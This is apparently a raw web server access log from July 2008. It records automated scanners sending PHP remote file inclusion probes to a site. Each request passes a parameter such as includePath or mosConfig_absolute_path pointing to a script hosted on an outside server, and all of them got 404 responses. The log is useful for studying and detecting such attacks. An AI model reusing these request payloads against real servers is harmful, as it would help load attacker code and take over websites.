87.216.220.170 - - [06/Jul/2008:19:07:55 -0700] "GET /logs/access_070820.log/claroline/inc/claro_init_header.inc.php?includePath=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.216.220.170 - - [06/Jul/2008:19:07:55 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.216.220.170 - - [06/Jul/2008:19:07:56 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:08:34 -0700] "GET /logs/index.php?table=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:08:34 -0700] "GET /logs/access_071029.log/index.php?table=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:08:34 -0700] "GET /index.php?table=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
116.125.113.115 - - [06/Jul/2008:19:08:45 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
116.125.113.115 - - [06/Jul/2008:19:08:45 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
80.82.215.11 - - [06/Jul/2008:19:11:26 -0700] "GET /logs/account.php?action=http://www.creativ-s.ru/tmp/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.82.215.11 - - [06/Jul/2008:19:11:26 -0700] "GET /account.php?action=http://www.creativ-s.ru/tmp/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:11:34 -0700] "GET /logs/index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:11:34 -0700] "GET /index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:11:47 -0700] "GET /logs/access_080127.log/index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:11:47 -0700] "GET /logs/access_071112.log/index.phpmain.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
193.28.86.50 - - [06/Jul/2008:19:12:14 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:12:20 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:12:20 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
202.181.105.117 - - [06/Jul/2008:19:12:20 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/